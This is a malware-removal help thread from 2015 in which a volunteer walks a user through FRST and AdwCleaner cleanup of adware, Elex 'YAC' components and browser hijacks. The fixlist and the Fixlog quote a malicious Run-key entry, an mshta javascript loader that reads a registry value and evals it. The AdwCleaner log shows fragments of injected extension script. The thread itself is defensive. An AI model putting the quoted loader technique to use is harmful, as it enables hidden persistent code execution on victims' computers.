2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2010-09-03 16:09 - 2010-09-03 16:09 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2010-07-17 14:19 - 2010-07-17 14:20 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2010-07-17 14:21 - 2010-07-17 14:24 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2010-09-03 16:09 - 2010-09-03 16:10 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-05-24 14:20
 
==================== End of log ============================


 

 

 


 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 39,888 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:05:47 PM

Posted 03 June 2015 - 10:03 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can, please print this topic. It will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Found out more about this infection.
http://www.bleepingcomputer.com/virus-removal/ctb-locker-ransomware-information
<<<>>>

Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below.
 
start

CreateRestorePoint:
CloseProcesses:

(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
HKLM-x32\...\Run: [**e7921432<*>] => mshta javascript:QYVy9thhg="Uk6";i1j9=new%20ActiveXObject("WScript.Shell");S8psbceX="Yoa299EH";YsQE36=i1j9.RegRead("HKLM\\software\\Wow6432Node\\82df414c\\31a74d1c");PFDgEA0DA="xpr";eval(YsQE36);gemCD (the data entry has 15 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [Run] "C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\IEUpdate\choice.exe"
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2753f75-9f16-43f8-a6aa-560f7f38d639} <======= ATTENTION (Policy restriction on IP)
Toolbar: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF SelectedSearchEngine: mystartsearch
FF DefaultSearchEngine: mystartsearch
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml [2015-04-27]
FF Extension: Ads Removal - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net [2014-11-29]
FF Extension: ExstraCooupono - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com [2015-05-08]
FF Extension: MsxmlIsland - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [sweetsearch@gmail.com] - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\extensions\sweetsearch@gmail.com
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [118048 2015-05-27] (Elex do Brasil Participações Ltda)
S4 GameConsoleService; No ImagePath
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [260856 2015-05-27] (Elex do Brasil Participações Ltda)
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [53568 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [108616 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [50944 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [102416 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2015-04-17] (Elex do Brasil Participações Ltda)
U0 jbhqfl; C:\Windows\System32\drivers\bdpb.sys [79064 2015-06-01] (Malwarebytes Corporation)
S3 WinRing0_1_2_0; No ImagePath
U3 catchme; \??\C:\ComboFix\catchme.sys [X]
C:\Program Files (x86)\Elex-tech
C:\Windows\System32\DRIVERS\iSafeNetFilter.sys
C:\Windows\System32\drivers\bdpb.sys

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt). Please post it in your reply.
===

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the Report button and the report will open in Notepad.
IMPORTANT
  • If you click the Clean button all items listed in the report will be removed.
If you find some false positive items or programs that you wish to keep, close the AdwCleaner windows.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Check off the element(s) you wish to keep.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished.
  • Please post the content of that log file with your next answer.
  • You can find the log file at C:\AdwCleaner[Sn].txt (n is a number).
===

CHR dev: Chrome dev build detected! <======= ATTENTION

Your copy of Chrome has been compromised

Re-install Chrome

Unless you did this yourself, malware has changed your Chrome version into the Development Build. Among other things this allows malware to install any extension it wants.


Remove Chrome using the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

Before you do, export your bookmarks.
Chrome will export your bookmarks as an HTML file, which you can then import into another browser.

Re-install Chrome and the Bookmarks.

If you want to save all your settings refer to this page.
Follow the instructions before removing Chrome.
http://juan2geek.com/how-to-backup-and-restore-entire-google-chrome-setting/
<<<>>>


How is the computer running now?

#3 Deside93


Posted 03 June 2015 - 10:52 AM

Hello Nasdaq! Thank you very much for your reply!
I think I solved my problem yesterday with the help of a friend who suggested that I scan my PC with Bitdefender and Avetix, but I'm not sure.
I did what you suggested and these are the results: 

THIS IS THE FIX LOG
 

Fix result of Farbar Recovery Scan Tool (x64) Version: 29-05-2015
Ran by Giovanni at 2015-06-03 17:28:52 Run:1
Running from C:\Users\Giovanni\Downloads
Loaded Profiles: Giovanni (Available Profiles: Giovanni)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
CloseProcesses:
 
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe
(Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe
HKLM-x32\...\Run: [**e7921432<*>] => mshta javascript:QYVy9thhg="Uk6";i1j9=new%20ActiveXObject("WScript.Shell");S8psbceX="Yoa299EH";YsQE36=i1j9.RegRead("HKLM\\software\\Wow6432Node\\82df414c\\31a74d1c");PFDgEA0DA="xpr";eval(YsQE36);gemCD (the data entry has 15 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\...\Policies\Explorer: [Run] "C:\Users\Giovanni\AppData\Roaming\Microsoft\Windows\IEUpdate\choice.exe"
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{b2753f75-9f16-43f8-a6aa-560f7f38d639} <======= ATTENTION (Policy restriction on IP)
Toolbar: HKU\S-1-5-21-2758695802-2872600399-379456914-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
FF SelectedSearchEngine: mystartsearch
FF DefaultSearchEngine: mystartsearch
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml [2015-04-27]
FF Extension: Ads Removal - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net [2014-11-29]
FF Extension: ExstraCooupono - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com [2015-05-08]
FF Extension: MsxmlIsland - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} [2015-06-01]
FF HKLM-x32\...\Firefox\Extensions: [sweetsearch@gmail.com] - C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\extensions\sweetsearch@gmail.com
CHR HKLM-x32\...\Chrome\Extension: [bopakagnckmlgajfccecajhnimjiiedh] - http://clients2.google.com/service/update2/crx
R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [118048 2015-05-27] (Elex do Brasil Participações Ltda)
S4 GameConsoleService; No ImagePath
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [260856 2015-05-27] (Elex do Brasil Participações Ltda)
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [53568 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [108616 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [50944 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [102416 2015-05-27] (Elex do Brasil Participações Ltda)
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2015-04-17] (Elex do Brasil Participações Ltda)
U0 jbhqfl; C:\Windows\System32\drivers\bdpb.sys [79064 2015-06-01] (Malwarebytes Corporation)
S3 WinRing0_1_2_0; No ImagePath
U3 catchme; \??\C:\ComboFix\catchme.sys [X]
C:\Program Files (x86)\Elex-tech
C:\Windows\System32\DRIVERS\iSafeNetFilter.sys
C:\Windows\System32\drivers\bdpb.sys
 
End
*****************
 
Restore point was successfully created.
Processes closed successfully.
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe => No running process found
C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe => No running process found
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\**e7921432<*> => value not found.
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\Run => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0PerformanceMonitor => key not found. 
HKCR\CLSID\{3B5B973C-92A4-4855-9D3F-0F3D23332208} => key not found. 
"HKLM\SOFTWARE\Policies\Google" => key Removed successfully
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found. 
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer => key not found. 
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy => value not found.
HKU\S-1-5-21-2758695802-2872600399-379456914-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value Removed successfully
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => key not found. 
Firefox SelectedSearchEngine Removed successfully
Firefox DefaultSearchEngine Removed successfully
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key Removed successfully
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => key Removed successfully
"C:\Program Files (x86)\mozilla firefox\browser\searchplugins\mystartsearch.xml" => not found.
C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\adremoveext@adremoveext.net => Moved successfully.
C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\ZAXde@7.com => Moved successfully.
C:\Users\Giovanni\AppData\Roaming\Mozilla\Firefox\Profiles\wm2fy6v7.default\Extensions\{37785233-93AF-883B-AF47-11A5FE69E9A5} => Moved successfully.
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\sweetsearch@gmail.com => value Removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bopakagnckmlgajfccecajhnimjiiedh" => key Removed successfully
iSafeService => Service not found.
GameConsoleService => Service Removed successfully
iSafeKrnl => Service not found.
iSafeKrnlBoot => Service not found.
iSafeKrnlKit => Service not found.
iSafeKrnlMon => Service not found.
iSafeKrnlR3 => Service not found.
iSafeNetFilter => Service not found.
jbhqfl => Service not found.
WinRing0_1_2_0 => Service Removed successfully
catchme => Service not found.
C:\Program Files (x86)\Elex-tech => Moved successfully.
"C:\Windows\System32\DRIVERS\iSafeNetFilter.sys" => File/Folder not found.
"C:\Windows\System32\drivers\bdpb.sys" => File/Folder not found.
 
 
The system needed a reboot. 
 
==== End of Fixlog 17:29:15 ====


THIS IS THE ADWCLEANER[S0].TXT

# AdwCleaner v4.206 - Creato file registro eventi 03/06/2015 in 17:40:30
# Aggiornato 01/06/2015 da Xplode
# Database : 2015-06-01.1 [Server]
# Sistema operativo : Windows 7 Home Premium Service Pack 1 (x64)
# Nome utente : Giovanni - GIOVANNI-HP
# In esecuzione da : C:\Users\Giovanni\Downloads\adwcleaner_4.206.exe
# Opzione : Pulizia
 
***** [ Servizi ] *****
 
 
***** [ File / Cartelle ] *****
 
Cartella Eliminato : C:\ProgramData\6203870372029230384
Cartella Eliminato : C:\ProgramData\{19cd36e7-34d1-386e-19cd-d36e734ddb9c}
Cartella Eliminato : C:\Program Files (x86)\bestadblocker
Cartella Eliminato : C:\Users\Giovanni\AppData\Local\Temp\iSafeRightKeyScan
Cartella Eliminato : C:\Users\Giovanni\AppData\Roaming\eCyber
Cartella Eliminato : C:\Users\Giovanni\AppData\Roaming\Elex-tech
Cartella Eliminato : C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Extensions\femogmcmjpjkokoojcljkpfdifkpbbpp
Cartella Eliminato : C:\ProgramData\deoopnakmfchinkaabfjchnemeihjjee
File Eliminato : C:\Windows\System32\roboot64.exe
File Eliminato : C:\Program Files (x86)\Mozilla Firefox\defaults\pref\channel-prefs.JS.xjryulf
File Eliminato : C:\Users\Giovanni\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage
 
***** [ Attività pianificate ] *****
 
Attività Eliminato : RDReminder
Attività Eliminato : Bidaily Synchronize Task
 
***** [ Collegamenti ] *****
 
 
***** [ Registry ] *****
 
Chiave Eliminato : HKCU\Software\Mozilla\Extends
Chiave Eliminato : HKLM\SOFTWARE\97054f71-2ba2-f07c-138e-f95a4694c1fd
Chiave Eliminato : HKLM\SOFTWARE\Classes\CLSID\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BA0C978D-D909-49B6-AFE2-8BDE245DC7E6}
Chiave Eliminato : HKCU\Software\Softonic
Chiave Eliminato : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Chiave Eliminato : HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}
Chiave Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\SearchProtect
Chiave Eliminato : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E957849A-94AC-6F46-4623-C31474E3C170}
Dati Eliminato : HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings [ProxyOverride] - *.local
 
***** [ Browser web ] *****
 
-\\ Internet Explorer v11.0.9600.17801
 
 
-\\ Mozilla Firefox v36.0.1 (x86 it)
 
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.alias", "mystartsearch");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.iconURL", "hxxp://www.mystartsearch.com/favicon.ico");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.name", "mystartsearch");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.searchengine.url", "hxxp://www.mystartsearch.com/web/?type=ds&ts=1430038774&from=wpc&uid=WDCXWD3200BEKT-60V5T1_WD-WXF1A60K2261K2261&q={searchTerms}");
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("extensions.4qgrygyZ6zVESyuH.scode", "(function(){try{if(window.self.location.href.indexOf(\"rjkErjC5rjgFrTg6qTwHqja4pn\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\"[...]
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("extensions.tSasjL7AESlknzVt.scode", "(function(){try{if(window.self.location.href.indexOf(\"rjkErjC5rjgFrTg6qTwHqja4pn\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\"[...]
[wm2fy6v7.default\prefs.js] - Linea Eliminato : user_pref("browser.search.defaultenginename", "mystartsearch");
 
-\\ Google Chrome v43.0.2357.81
 
 
-\\ Chromium v
 
 
*************************
 
AdwCleaner[R0].txt - [4171 byte] - [03/06/2015 17:38:03]
AdwCleaner[S0].txt - [4048 byte] - [03/06/2015 17:40:30]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4106  byte] ##########




I deleted some files with the scan you suggested and I think that now my PC is 100% free from malware and viruses.
Thanks!!
 
 


 



#4 nasdaq


Posted 03 June 2015 - 12:37 PM

If all is well.

To learn more about how to protect yourself while on the internet, read this little guide on best security practices to keep safe.
http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/
===

#5 nasdaq


Posted 09 June 2015 - 10:21 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.



